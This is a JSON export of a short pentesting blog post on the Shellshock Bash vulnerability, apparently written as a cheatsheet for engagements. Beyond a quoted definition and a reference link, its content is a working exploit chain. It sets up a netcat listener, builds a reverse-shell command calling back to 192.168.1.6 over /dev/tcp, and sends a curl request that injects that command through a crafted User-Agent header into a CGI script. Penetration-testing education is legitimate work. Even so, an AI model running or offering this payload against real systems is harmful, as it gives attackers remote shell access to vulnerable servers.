{"id":330,"date":"2021-05-04T16:34:53","date_gmt":"2021-05-04T16:34:53","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=330"},"modified":"2021-07-15T03:02:46","modified_gmt":"2021-07-15T03:02:46","slug":"shellshock","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/shellshock\/","title":{"rendered":"Shellshock."},"content":{"rendered":"\n<div class=\"wp-block-cover has-background-dim\"><img loading=\"lazy\" decoding=\"async\" width=\"1788\" height=\"1007\" class=\"wp-block-cover__image-background wp-image-331\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/05\/shellshock.jpeg\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-vivid-red-color has-text-color\">S1REN<\/p>\n\n\n\n<p class=\"has-text-align-center has-large-font-size\">The Hacker's Dream Shell. (<em>once upon a time<\/em>)<\/p>\n<\/div><\/div>\n\n\n\n<p id=\"shellshock\"><strong>\"Shellshock<\/strong>, also known as&nbsp;<strong>Bashdoor<\/strong>,&nbsp;is a family of&nbsp;<a href=\"https:\/\/en.wikipedia.org\/wiki\/Security_bug\">security bugs<\/a>&nbsp;in the&nbsp;Unix Bash shel<a href=\"https:\/\/en.wikipedia.org\/wiki\/Shell_(computing)\">l<\/a>, the first of which was disclosed on 24 September 2014. 
Shellshock could enable an attacker to cause Bash to&nbsp;<a href=\"https:\/\/en.wikipedia.org\/wiki\/Arbitrary_code_execution\">execute arbitrary commands<\/a>&nbsp;and gain unauthorized access&nbsp;to many Internet-facing services, such as web servers, that use Bash to process requests.<strong>\"<\/strong><br><br><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"225\" class=\"wp-image-333\" style=\"width: 400px;\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/05\/yeah.gif\" alt=\"\"><\/p>\n\n\n\n<p>If you're on an engagement and you discover a \/cgi-bin\/ directory, it would be wise to fuzz for file names + \".cgi\". CGI files left behind by a default configuration, or by a developer who was using them for debugging, are an important thing to check for. <br><br>Let's suppose you found something like \/<strong>cgi-bin<\/strong>\/<strong>superadmin.cgi<\/strong> during your engagement. The first thing that should come to your mind is \"<em>I wonder if it's vulnerable to Shellshock?<\/em>\". <br><br>nc -nlvp 9997<br>export <strong>CMD<\/strong>=\"bash -i &gt;&amp; \/dev\/tcp\/192.168.1.6\/9997 0&gt;&amp;1\"<br>curl -H \"User-Agent: () { :; }; \/bin\/bash -c 'echo aaaa; ${<strong>CMD<\/strong>}; echo zzzz;'\" http:\/\/example.com\/<strong>cgi-bin<\/strong>\/<strong>superadmin.cgi<\/strong><br><br><em>Shell.<\/em><br><br><strong>Here's a great reference if you want to learn more about how it works:<\/strong><br><a href=\"https:\/\/www.troyhunt.com\/everything-you-need-to-know-about2\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.troyhunt.com\/everything-you-need-to-know-about2\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\"Shellshock, also known as&nbsp;Bashdoor,&nbsp;is a family of&nbsp;security bugs&nbsp;in the&nbsp;Unix Bash shell, the first of which was disclosed on 24 September 2014. 
Shellshock could enable an attacker to cause Bash to&nbsp;execute arbitrary commands&nbsp;and gain unauthorized access&nbsp;to many Internet-facing services, such as web servers, that use Bash to process requests.\" If you're on an engagement and you [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":331,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[57,4,58,56],"class_list":["post-330","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-cheatsheet","tag-s1ren","tag-shell-shock-attack","tag-shellshock"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=330"}],"version-history":[{"count":2,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/330\/revisions"}],"predecessor-version":[{"id":413,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/330\/revisions\/413"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/331"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}